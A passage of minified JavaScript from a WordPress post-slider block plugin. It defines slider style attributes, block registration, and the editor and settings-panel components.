color:{{arrowHoverColor}}; }"}]},arrowBg:{type:"string",default:"#fff",style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow { background:{{arrowBg}}; }"}]},arrowHoverBg:{type:"string",default:"#037fff",style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover { background:{{arrowHoverBg}}; }"}]},arrowBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow"}]},arrowHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover"}]},arrowRadius:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow { border-radius: {{arrowRadius}}; }"}]},arrowHoverRadius:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover { border-radius: {{arrowHoverRadius}}; }"}]},arrowShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow"}]},arrowHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"arrows",condition:"==",value:!0}],selector:"{{ULTP}} .slick-arrow:hover"}]},dotWidth:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button { width:{{dotWidth}}; }"}]},dotHeight:{type:"object",default:{lg:"10",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button { height:{{dotHeight}}; }"}]},dotHoverWidth:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li.slick-active button { width:{{dotHoverWidth}}; }"}]},dotHoverHeight:{type:"object",default:{lg:"16",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li.slick-active button { height:{{dotHoverHeight}}; }"}]},dotSpace:{type:"object",default:{lg:"4",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots { padding: 0 {{dotSpace}}; }  \n          {{ULTP}} .slick-dots li button { margin: 0 {{dotSpace}}; }"}]},dotVartical:{type:"object",default:{lg:"40",unit:"px"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots { bottom:{{dotVartical}}; }"}]},dotHorizontal:{type:"object",default:{lg:""},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots { left:{{dotHorizontal}}; }"}]},dotBg:{type:"string",default:"#f5f5f5",style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button { background:{{dotBg}}; }"}]},dotHoverBg:{type:"string",default:"#000",style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button:hover,  \n          {{ULTP}} .slick-dots li.slick-active button { background:{{dotHoverBg}}; }"}]},dotBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button"}]},dotHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button:hover,  \n          {{ULTP}} .slick-dots li.slick-active button"}]},dotRadius:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button { border-radius: {{dotRadius}}; }"}]},dotHoverRadius:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button:hover,  \n          {{ULTP}} .slick-dots li.slick-active button { border-radius: {{dotHoverRadius}}; }"}]},dotShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button"}]},dotHoverShadow:{type:"object",default:{openShadow:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4"},style:[{depends:[{key:"dots",condition:"==",value:!0}],selector:"{{ULTP}} .slick-dots li button:hover,  \n          {{ULTP}} .slick-dots li.slick-active button"}]},contentVerticalPosition:{type:"string",default:"middlePosition",style:[{depends:[{key:"contentVerticalPosition",condition:"==",value:"topPosition"}],selector:"{{ULTP}} .ultp-block-content-topPosition { align-items:flex-start; }"},{depends:[{key:"contentVerticalPosition",condition:"==",value:"middlePosition"}],selector:"{{ULTP}} .ultp-block-content-middlePosition { align-items:center; }"},{depends:[{key:"contentVerticalPosition",condition:"==",value:"bottomPosition"}],selector:"{{ULTP}} .ultp-block-content-bottomPosition { align-items:flex-end; }"}]},contentHorizontalPosition:{type:"string",default:"centerPosition",style:[{depends:[{key:"contentHorizontalPosition",condition:"==",value:"leftPosition"}],selector:"{{ULTP}} .ultp-block-content-leftPosition { justify-content:flex-start; }"},{depends:[{key:"contentHorizontalPosition",condition:"==",value:"centerPosition"}],selector:"{{ULTP}} .ultp-block-content-centerPosition { justify-content:center; }"},{depends:[{key:"contentHorizontalPosition",condition:"==",value:"rightPosition"}],selector:"{{ULTP}} .ultp-block-content-rightPosition { justify-content:flex-end; }"}]},contentAlign:{type:"string",default:"center",style:[{depends:[{key:"contentAlign",condition:"==",value:"left"}],selector:"{{ULTP}} .ultp-block-content-inner { text-align:{{contentAlign}}; }  \n          {{ULTP}} .ultp-block-meta { justify-content: flex-start; }"},{depends:[{key:"contentAlign",condition:"==",value:"center"}],selector:"{{ULTP}} .ultp-block-content-inner { text-align:{{contentAlign}}; }  \n          {{ULTP}} .ultp-block-meta { justify-content: center; }"},{depends:[{key:"contentAlign",condition:"==",value:"right"}],selector:"{{ULTP}} .ultp-block-content-inner { text-align:{{contentAlign}}; }  \n          {{ULTP}} .ultp-block-meta { justify-content: flex-end; }"}]},contenWraptWidth:{type:"object",default:{lg:"60",unit:"%"},style:[{selector:"{{ULTP}} .ultp-block-content-inner { width:{{contenWraptWidth}}; }"}]},contenWraptHeight:{type:"object",default:{lg:""},style:[{selector:"{{ULTP}} .ultp-block-content-inner { height:{{contenWraptHeight}}; }"}]},contentWrapBg:{type:"string",default:"#fff",style:[{selector:"{{ULTP}} .ultp-block-content-inner { background:{{contentWrapBg}}; }"}]},contentWrapHoverBg:{type:"string",style:[{selector:"{{ULTP}} .ultp-block-content-inner:hover { background:{{contentWrapHoverBg}}; }"}]},contentWrapBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-inner"}]},contentWrapHoverBorder:{type:"object",default:{openBorder:0,width:{top:1,right:1,bottom:1,left:1},color:"#009fd4",type:"solid"},style:[{selector:"{{ULTP}} .ultp-block-content-inner:hover"}]},contentWrapRadius:{type:"object",default:{lg:{top:"6",bottom:"6",left:"6",right:"6",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner{ border-radius: {{contentWrapRadius}}; }"}]},contentWrapHoverRadius:{type:"object",default:{lg:{top:"10",bottom:"10",left:"10",right:"10",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner:hover{ border-radius: {{contentWrapHoverRadius}}; }"}]},contentWrapShadow:{type:"object",default:{openShadow:0,width:{top:0,right:5,bottom:15,left:0},color:"rgba(0,0,0,0.15)"},style:[{selector:"{{ULTP}} .ultp-block-content-inner"}]},contentWrapHoverShadow:{type:"object",default:{openShadow:0,width:{top:0,right:10,bottom:25,left:0},color:"rgba(0,0,0,0.25)"},style:[{selector:"{{ULTP}} .ultp-block-content-inner:hover"}]},contentWrapPadding:{type:"object",default:{lg:{top:"50",bottom:"50",left:"50",right:"50",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner { padding: {{contentWrapPadding}}; }"}]},contentMargin:{type:"object",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-block-content-inner { margin: {{contentMargin}}; }"}]},headingShow:{type:"boolean",default:!1},headingText:{type:"string",default:"Post Slider #1"},...(0,o.t)(["advanceAttr","heading","meta","category","readMore","query"],[],[{key:"queryNumPosts",default:{lg:5}},{key:"queryNumber",default:5},{key:"metaSeparator",default:"dash"},{key:"metaColor",default:"#989898"},{key:"metaSeparatorColor",default:"#b3b3b3"},{key:"catSacing",default:{lg:{top:-65,bottom:5,left:0,right:0,unit:"px"}}},{key:"catPadding",default:{lg:{top:8,bottom:6,left:16,right:16,unit:"px"}}},{key:"readMore",default:!0},{key:"readMoreColor",default:"#000"},{key:"readMoreBgColor",default:{openColor:0,type:"color",color:"#037fff"}},{key:"readMoreHoverColor",default:"#037fff"},{key:"readMoreBgHoverColor",default:{openColor:0,type:"color",color:"#0c32d8"}},{key:"readMoreSacing",default:{lg:{top:30,bottom:"",left:"",right:"",unit:"px"}}},{key:"readMorePadding",default:{lg:{top:"",bottom:"",left:"",right:"",unit:"px"}}}]),V4_1_0_CompCheck:a.O,...(0,i.b)()}},5930:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(40181),n=l(48161),r=l(74384);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks;(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/post-slider-1/","block_docs"),s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/post-slider-1.svg"}),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/postslider1.svg"}},edit:i.Z,save:()=>null})},73504:(e,t,l)=>{"use strict";l.d(t,{Z:()=>M});var o=l(67294),a=l(46066),i=l(25335),n=l(53049),r=l(73151),s=l(23890),p=l(49491),c=l(29236),u=l(46896),d=l(8152),m=l(76005),g=l(99838),y=l(69735),b=l(2963),v=l(39349),h=l(87025),f=l(31760),k=l(83100),w=l(64766),x=l(34047);const{__}=wp.i18n,{InspectorControls:T,useBlockProps:_}=wp.blockEditor,{useEffect:C,useState:E,useRef:S,Fragment:P}=wp.element,{Spinner:L,Placeholder:I}=wp.components,{getBlockAttributes:B,getBlockRootClientId:U}=wp.data.select("core/block-editor");function M(e){const t=S(null),[l,M]=E(h.Ti),[A,H]=E(null),{setAttributes:N,className:j,clientId:Z,name:O,attributes:R,isSelected:D,context:z,attributes:{blockId:F,imageShow:W,imgCrop:V,readMoreIcon:G,arrowStyle:q,arrows:$,fade:K,dots:J,slideSpeed:Y,autoPlay:X,readMore:Q,readMoreText:ee,excerptLimit:te,metaStyle:le,catShow:oe,metaSeparator:ae,titleShow:ie,catStyle:ne,catPosition:re,titlePosition:se,excerptShow:pe,metaList:ce,metaShow:ue,headingShow:de,headingStyle:me,headingAlign:ge,headingURL:ye,headingText:be,headingBtnText:ve,subHeadingShow:he,subHeadingText:fe,metaPosition:ke,imgOverlay:we,imgOverlayType:xe,contentVerticalPosition:Te,contentHorizontalPosition:_e,showFullExcerpt:Ce,customCatColor:Ee,onlyCatColor:Se,contentTag:Pe,titleTag:Le,showSeoMeta:Ie,titleLength:Be,metaMinText:Ue,metaAuthorPrefix:Me,titleStyle:Ae,metaDateFormat:He,slidesToShow:Ne,authorLink:je,layout:Ze,sliderGap:Oe,contenWraptHeight:Re,catBgColor:De,catPadding:ze,dotVartical:Fe,dotRadius:We,slidesCenterPadding:Ve,fallbackEnable:Ge,headingTag:qe,notFoundMessage:$e,dcEnabled:Ke,dcFields:Je,previewImg:Ye,advanceId:Xe,V4_1_0_CompCheck:{runComp:Qe},currentPostId:et,blockPubDate:tt}}=e;function lt(e){M({...l,selectedDC:e})}function ot(){M({...l,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function at(e){M({...l,section:{...h.ZQ,[e]:!0}}),(0,h.Rt)(e),(0,h.ob)(e),H("setting")}function it(e){M((t=>({...t,toolbarSettings:e}))),(0,h.os)(e)}function nt(){l.error&&M({...l,error:!1}),l.loading||M({...l,loading:!0}),wp.apiFetch({path:"/ultp/fetch_posts",method:"POST",data:(0,n.Ld)(R)}).then((e=>{M({...l,postsList:e,loading:!1})})).catch((e=>{M({...l,loading:!1,error:!0})}))}function rt(e,t){e.stopPropagation(),at("arrow"),it("arrow"),t()}C((()=>{(0,h.oA)(),nt()}),[]),C((()=>{const t=Z.substr(0,6),l=B(U(Z));(0,r.h)(e),(0,n.qi)(N,l,et,Z),"empty"==tt&&N({blockPubDate:(new Date).toISOString()}),F?F&&F!=t&&(l?.hasOwnProperty("ref")||(0,n.k0)()||l?.hasOwnProperty("theme")||N({blockId:t})):(N({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&N({queryType:"archiveBuilder"}))}),[Z]),C((()=>{const e=t.current;(0,y.o6)()&&0===R.dcFields.length&&N({dcFields:Array(x.PR).fill(void 0)}),e?((0,n.Qr)(e,R)&&(nt(),t.current=R),e.isSelected!==D&&D&&(0,h.gT)(at,it)):t.current=R}),[R]);const st={settingTab:A,setSettingTab:H,setAttributes:N,name:O,attributes:R,setSection:at,section:l.section,clientId:Z,context:z,setSelectedDc:lt,selectedDC:l.selectedDC,selectParentMetaGroup:function(e){lt(e),it("dc_group")}};let pt;if(F&&(pt=(0,g.Kh)(R,"ultimate-post/post-slider-2",F,(0,n.k0)())),Ye)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Ye});const ct=(0,k.Z)("","slider_2",ultp_data.affiliate_id),ut=_({...Xe&&{id:Xe},className:`ultp-block-${F} ${j}`,onClick:e=>{e.stopPropagation(),at("general"),it("")}});return(0,o.createElement)(P,null,(0,o.createElement)(x.FP,{store:st,selected:l.toolbarSettings}),(0,o.createElement)(f.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"feat_toggle",label:__("Slider Features","ultimate-post"),data:n.$m,new:n.KE,[Qe?"exclude":"dep"]:n.N2}],store:st}),(0,o.createElement)(T,null,(0,o.createElement)(x.ZP,{store:st})),(0,o.createElement)("div",ut,pt&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:pt}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},!ultp_data.active&&(0,o.createElement)("div",{className:"ultp-pro-helper"},(0,o.createElement)("div",{className:"ultp-pro-helper__upgrade"},(0,o.createElement)("span",null,"To Unlock Slider Block"),(0,o.createElement)("a",{className:"ultp-upgrade-pro",href:ct,target:"_blank",rel:"noreferrer"}," ","Upgrade to Pro"," "),(0,o.createElement)("a",{href:"https://www.wpxpo.com/postx/blocks/#demoid7487",target:"_blank",rel:"noreferrer"}," ","View Demo"))),function(){const e=`${Pe}`,t={arrows:$,dots:J,autoplay:X,infinite:!0,cssEase:"linear",speed:500,autoplaySpeed:parseInt(Y),nextArrow:(0,o.createElement)((e=>{const{className:t,onClick:l}=e,a=q.split("#");return(0,o.createElement)("div",{className:t,onClick:e=>{rt(e,l)}},w.ZP[a[1]])}),null),prevArrow:(0,o.createElement)((e=>{const{className:t,onClick:l}=e,a=q.split("#");return(0,o.createElement)("div",{className:t,onClick:e=>{rt(e,l)}},w.ZP[a[0]])}),null)},r="slide2"==Ze||"slide3"==Ze||"slide5"==Ze||"slide6"==Ze||"slide8"==Ze,g=parseInt(Ne.lg)?parseInt(Ne.lg):1,h=parseInt(Ne.sm)?parseInt(Ne.sm):1,f=parseInt(Ne.xs)?parseInt(Ne.xs):1;if(K&&r)t.slidesToShow=1,t.fade=K;else if(!K&&r)t.slidesToShow=g,t.responsive=[{breakpoint:991,settings:{slidesToShow:h,slidesToScroll:1}},{breakpoint:767,settings:{slidesToShow:f,slidesToScroll:1}}];else{const e=wp.data.select("core/editor").getDeviceType?.()||wp.data.select(wp.data.select("core/edit-site")?"core/edit-site":"core/edit-post").__experimentalGetPreviewDeviceType();t.centerMode=!0,"Tablet"==e?(t.slidesToShow=h,t.centerPadding=Ve.sm?Ve.sm+"px":"50px"):"Mobile"==e?(t.slidesToShow=f,t.centerPadding=Ve.xs?Ve.xs+"px":"100px"):(t.slidesToShow=g,t.centerPadding=Ve.lg?Ve.lg+"px":"100px"),t.responsive=[{breakpoint:991,settings:{slidesToShow:h,slidesToScroll:1,centerPadding:Ve.sm?Ve.sm+"px":"100px"}},{breakpoint:767,settings:{slidesToShow:f,slidesToScroll:1,centerPadding:Ve.xs?Ve.xs+"px":"50px"}}]}t.appendDots=e=>(0,o.createElement)("div",{onClick:e=>function(e){e.stopPropagation(),at("dot"),it("dot")}(e)},(0,o.createElement)("ul",null," ",e," "));const k=(0,n.fk)(t),x=(e,t)=>(0,y.o6)()&&Ke&&(0,o.createElement)(v.Z,{idx:e,postId:t,fields:Je,settingsOnClick:(e,t)=>{e?.stopPropagation(),it(t)},selectedDC:l.selectedDC,setSelectedDc:lt,setAttributes:N,dcFields:Je});return l.error?(0,o.createElement)(I,{label:__("Posts are not available.","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):l.loading?(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")},(0,o.createElement)(L,null)):l.postsList.length>0?(0,o.createElement)("div",{className:`ultp-block-items-wrap ultp-slide-${Ze} ${ultp_data.active?"":" ultp-wrapper-pro"}`},(0,o.createElement)("div",{onClick:e=>{e.preventDefault(),at("heading"),it("heading")}},(0,o.createElement)(i.Z,{props:{headingShow:de,headingStyle:me,headingAlign:ge,headingURL:ye,headingText:be,setAttributes:N,headingBtnText:ve,subHeadingShow:he,subHeadingText:fe,headingTag:qe}})),(0,o.createElement)(a.Z,k,l.postsList.map(((t,l)=>{const a=JSON.parse(ce.replaceAll("u0022",'"'));return(0,o.createElement)(e,{key:l,className:`ultp-block-item post-id-${t.ID}`},(0,o.createElement)("div",{className:"ultp-block-slider-wrap"},(0,o.createElement)("div",{className:"ultp-block-image-inner"},(t.image&&!t.is_fallback||Ge)&&(0,o.createElement)(c.xj,{imgOverlay:we,imgOverlayType:xe,post:t,fallbackEnable:Ge,idx:l,imgCrop:V,onClick:()=>{}})),(0,o.createElement)(c.UU,{contentHorizontalPosition:_e,contentVerticalPosition:Te,onClick:e=>{e.stopPropagation(),at("image"),it("image")}},(0,o.createElement)("div",{className:"ultp-block-content-inner"},x(7,t.ID),(0,o.createElement)(s.Z,{post:t,catShow:oe,catStyle:ne,catPosition:re,customCatColor:Ee,onlyCatColor:Se,onClick:e=>{at("taxonomy-/-category"),it("cat")}}),x(6,t.ID),t.title&&ie&&1==se&&(0,o.createElement)(m.Z,{title:t.title,headingTag:Le,titleLength:Be,titleStyle:Ae,onClick:e=>{at("title"),it("title")}}),x(5,t.ID),ue&&"top"==ke&&(0,o.createElement)(u.Z,{meta:a,post:t,metaSeparator:ae,metaStyle:le,metaMinText:Ue,metaAuthorPrefix:Me,metaDateFormat:He,authorLink:je,onClick:e=>{at("meta"),it("meta")}}),x(4,t.ID),t.title&&ie&&0==se&&(0,o.createElement)(m.Z,{title:t.title,headingTag:Le,titleLength:Be,titleStyle:Ae,onClick:e=>{at("title"),it("title")}}),x(3,t.ID),pe&&(0,o.createElement)(p.Z,{excerpt:t.excerpt,excerpt_full:t.excerpt_full,seo_meta:t.seo_meta,excerptLimit:te,showFullExcerpt:Ce,showSeoMeta:Ie,onClick:e=>{at("excerpt"),it("excerpt")}}),x(2,t.ID),Q&&(0,o.createElement)(d.Z,{readMoreText:ee,readMoreIcon:G,titleLabel:t.title,onClick:()=>{at("read-more"),it("read-more")}}),x(1,t.ID),ue&&"bottom"==ke&&(0,o.createElement)(u.Z,{meta:a,post:t,metaSeparator:ae,metaStyle:le,metaMinText:Ue,metaAuthorPrefix:Me,metaDateFormat:He,authorLink:je,onClick:e=>{at("meta"),it("meta")}}),x(0,t.ID),(0,y.o6)()&&Ke&&(0,o.createElement)(b.Z,{dcFields:Je,setAttributes:N,startOnboarding:ot})))))})))):(0,o.createElement)(I,{className:"ultp-backend-block-loading",label:$e})}())))}},34047:(e,t,l)=>{"use strict";l.d(t,{FP:()=>b,PR:()=>g,ZP:()=>y});var o=l(67294),a=l(53049),i=l(38156),n=l(13448),r=l(32258),s=l(69735),p=l(82473),c=l(87282),u=l(92637),d=l(43581),m=l(50814);const{__}=wp.i18n,g=8;function y({store:e}){const{section:t,settingTab:l,setSettingTab:n}=e,{V4_1_0_CompCheck:{runComp:r}}=e.attributes;return(0,o.createElement)(o.Fragment,null,(0,o.createElement)(d.default,{prev:"https://www.wpxpo.com/postx/blocks/#demoid7487",store:e}),(0,o.createElement)(u.Sections,{settingTab:l,setSettingTab:n},(0,o.createElement)(u.Section,{slug:"sorting",title:__("Post Sorting","ultimate-post")},(0,o.createElement)(a.lA,{title:"inline",initialOpen:!0,store:e}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Include","ultimate-post"),include:c.fL}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("Exclude","ultimate-post"),include:c.M6}),(0,o.createElement)(a.T,{initialOpen:!1,store:e,title:__("inline","ultimate-post"),include:[{position:1,data:{type:"select",key:"queryUnique",label:__("Unique Content Group (Frontend Only)","ultimate-post"),pro:!0,options:[{value:"",label:__("Disable","ultimate-post")},{value:"group1",label:__("Content Group 1","ultimate-post")},{value:"group2",label:__("Content Group 2","ultimate-post")},{value:"group3",label:__("Content Group 3","ultimate-post")},{value:"group4",label:__("Content Group 4","ultimate-post")},{value:"group5",label:__("Content Group 5","ultimate-post")}],help:__("Unique Content Group solves the repetition of posts on multiple blocks.[Frontend Only]","ultimate-post")}}]})),(0,o.createElement)(u.Section,{slug:"setting",title:__("Settings","ultimate-post")},(0,o.createElement)(a.cA,{initialOpen:t.general,store:e,dynamicHelpText:{select:{key:"queryQuick",popular_post_1_day_view:"- Most viewed posts published in the last 24 hours",popular_post_7_days_view:"- Most viewed posts published in the last 7 days",popular_post_30_days_view:"- Most viewed posts published in the last 30 days",popular_post_all_times_view:"- Most viewed posts of all time"}},include:[{position:0,data:{type:"layout",block:"post-slider-2",key:"layout",exclude:["blockPubDate"],label:__("Slider Layout","ultimate-post"),options:[{img:"assets/img/layouts/slider2/layout1.png",label:__("Slide 1","ultimate-post"),value:"slide1"},{img:"assets/img/layouts/slider2/layout2.png",label:__("Slide 2","ultimate-post"),value:"slide2"},{img:"assets/img/layouts/slider2/layout3.png",label:__("Slide 3","ultimate-post"),value:"slide3"},{img:"assets/img/layouts/slider2/layout4.png",label:__("Slide 4","ultimate-post"),value:"slide4"},{img:"assets/img/layouts/slider2/layout5.png",label:__("Slide 5","ultimate-post"),value:"slide5"},{img:"assets/img/layouts/slider2/layout6.png",label:__("Slide 6","ultimate-post"),value:"slide6"},{img:"assets/img/layouts/slider2/layout7.png",label:__("Slide 7","ultimate-post"),value:"slide7"},{img:"assets/img/layouts/slider2/layout8.png",label:__("Slide 8","ultimate-post"),value:"slide8"}],variation:m.P}},{position:3,data:{type:"range",key:"slidesToShow",min:1,max:8,step:1,responsive:!0,label:__("Number of Slide","ultimate-post")}},{position:4,data:{type:"range",key:"height",label:__("Height","ultimate-post"),min:0,max:1e3,step:1,unit:!0,responsive:!0}},{position:5,data:{type:"range",key:"slidesCenterPadding",min:1,max:400,step:1,responsive:!0,label:__("Padding ( Center Mode )","ultimate-post")}},{position:6,data:{type:"range",key:"slidesTopPadding",min:0,max:150,step:1,label:__("Padding ( Top & Bottom )","ultimate-post")}},{position:7,data:{type:"range",key:"allItemScale",min:0,max:2.5,step:.01,responsive:!0,unit:!1,label:__("All Item Scale ( Center Mode )","ultimate-post")}},{position:8,data:{type:"range",key:"centerItemScale",min:0,max:2.5,step:.01,responsive:!0,unit:!1,label:__("Center Item Scale ( Center Mode )","ultimate-post")}},{position:9,data:{type:"range",key:"slideSpeed",min:0,max:1e4,step:100,label:__("Slide Speed","ultimate-post")}},{position:10,data:{type:"range",key:"sliderGap",min:-5,max:100,label:__("Slider Gap","ultimate-post")}},{position:11,data:{type:"toggle",key:"fade",label:__("Animation Fade","ultimate-post")}},{position:12,data:{type:"toggle",key:"autoPlay",label:__("Auto Play","ultimate-post")}},{position:13,data:{type:"toggle",key:"dots",label:__("Dots","ultimate-post")}},{position:14,data:{type:"toggle",key:"arrows",label:__("Arrows","ultimate-post")}},{position:15,data:{type:"toggle",key:"preLoader",label:__("Pre Loader","ultimate-post")}}],exclude:["columns","columnGridGap"]}),(0,o.createElement)(a.VH,{isTab:!0,store:e,depend:"titleShow",initialOpen:t.title,hrIdx:[4,9]}),(0,o.createElement)(a.Hn,{isTab:!0,store:e,initialOpen:t.image,include:[{position:3,data:{type:"range",key:"imgBgBlur",min:0,max:20,step:.5,responsive:!1,label:__("Background Blur","ultimate-post")}},{position:4,data:{type:"range",key:"imgBgbrightness",min:0,max:50,step:.5,responsive:!1,label:__("Background brightness","ultimate-post")}},{data:{type:"toggle",key:"fallbackEnable",label:__("Fallback Image Enable","ultimate-post")}},{data:{type:"media",key:"fallbackImg",label:__("Fallback Image","ultimate-post")}}],exclude:["imageScale","imgMargin","imgSeparator","imgCropSmall","imgAnimation"],hrIdx:[{tab:"settings",hr:[1,9]}]}),(0,o.createElement)(a.Yk,{isTab:!0,store:e,depend:"metaShow",initialOpen:t.meta,exclude:["metaListSmall"],hrIdx:[{tab:"settings",hr:[]},{tab:"style",hr:[2,8]}]}),(0,o.createElement)(a.Bq,{isTab:!0,initialOpen:t["taxonomy-/-category"],depend:"catShow",store:e,exclude:["catPosition"],hrIdx:[{tab:"style",hr:[8]}]}),(0,o.createElement)(a.oY,{isTab:!0,store:e,initialOpen:t["read-more"],depend:"readMore"}),(0,o.createElement)(a.X_,{isTab:!0,depend:"excerptShow",initialOpen:t.excerpt,store:e,hrIdx:[3,6]}),(0,o.createElement)(a.tf,{depend:"arrows",store:e,initialOpen:t.arrow,include:[{position:5,data:{type:"separator",key:"separatorStyle",label:__("Arrow Position","ultimate-post")}},{position:6,data:{type:"toggle",key:"arrowSpaceBetween",label:__("Arrow Space Between","ultimate-post")}},{position:7,data:{type:"range",key:"arrowPosBetween",min:1,max:1500,step:1,responsive:!0,label:__("Arrow Position","ultimate-post")}},{position:8,data:{type:"tag",key:"arrowPos",label:"Arrow Possition",disabled:!0,options:[{value:"left",label:__("Left","ultimate-post")},{value:"right",label:__("Right","ultimate-post")}]}},{position:9,data:{type:"range",key:"prevArrowPos",min:1,max:1500,step:1,responsive:!0,label:__("Previous Arrow Position","ultimate-post")}},{position:10,data:{type:"range",key:"nextArrowPos",min:1,max:1500,step:1,responsive:!0,label:__("Next Arrow Position","ultimate-post")}}]}),(0,o.createElement)(a.H_,{depend:"dots",store:e,initialOpen:t.dot}),(0,o.createElement)(a.O2,{store:e,exclude:["contentWrapInnerPadding"],include:[{position:0,data:{type:"tag",key:"contentVerticalPosition",label:"Vertical Position",disabled:!0,options:[{value:"topPosition",label:__("Top","ultimate-post")},{value:"middlePosition",label:__("Middle","ultimate-post")},{value:"bottomPosition",label:__("Bottom","ultimate-post")}]}},{position:1,data:{type:"tag",key:"contentHorizontalPosition",label:__("Horizontal Position","ultimate-post"),disabled:!0,options:[{value:"leftPosition",label:__("Left","ultimate-post")},{value:"centerPosition",label:__("Center","ultimate-post")},{value:"rightPosition",label:__("Right","ultimate-post")}]}},{position:2,data:{type:"separator"}},{position:4,data:{type:"range",key:"slideBgBlur",min:0,max:20,step:1,responsive:!1,label:__("Background Blur","ultimate-post")}},{position:7,data:{type:"dimension",key:"slideWrapMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}}]}),!r&&(0,o.createElement)(i.Z,{open:t.heading},(0,o.createElement)(a.Wh,{isTab:!0,store:e,initialOpen:t.heading,depend:"headingShow"}))),(0,o.createElement)(u.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:e,include:[{position:2,data:{type:"color",key:"loadingColor",label:__("Loading Color","ultimate-post"),pro:!0}}]}),(0,o.createElement)(a.Mg,{store:e}),(0,o.createElement)(a.iv,{store:e}))),(0,a.dH)())}function b({selected:e,store:t}){const{V4_1_0_CompCheck:{runComp:l}}=t.attributes,{metaShow:i,titleShow:c,titlePosition:u,excerptShow:d,readMore:m,metaPosition:g,catShow:y}=t.attributes,b=[i&&"bottom"==g,m,d,c&&0==u,i&&"top"==g,c&&1==u,y];if((0,s.o6)()&&e.startsWith("dc_"))return(0,o.createElement)(p.Z,{store:t,selected:e,layoutContext:b});switch(e){case"heading":return l?null:(0,o.createElement)(r.Z,{text:"Heading"},(0,o.createElement)(a.b0,{store:t,settingsTitle:__("Heading Settings","ultimate-post"),styleTitle:__("Heading Style","ultimate-post"),settingsKeys:a.cM,styleKeys:a.J5,oArgs:a.ii}));case"arrow":return(0,o.createElement)(r.Z,{text:"Arrow"},(0,o.createElement)(n.Z,{buttonContent:a.HT,include:(0,a.fA)({include:a.I0,exclude:"__all",title:__("Arrow 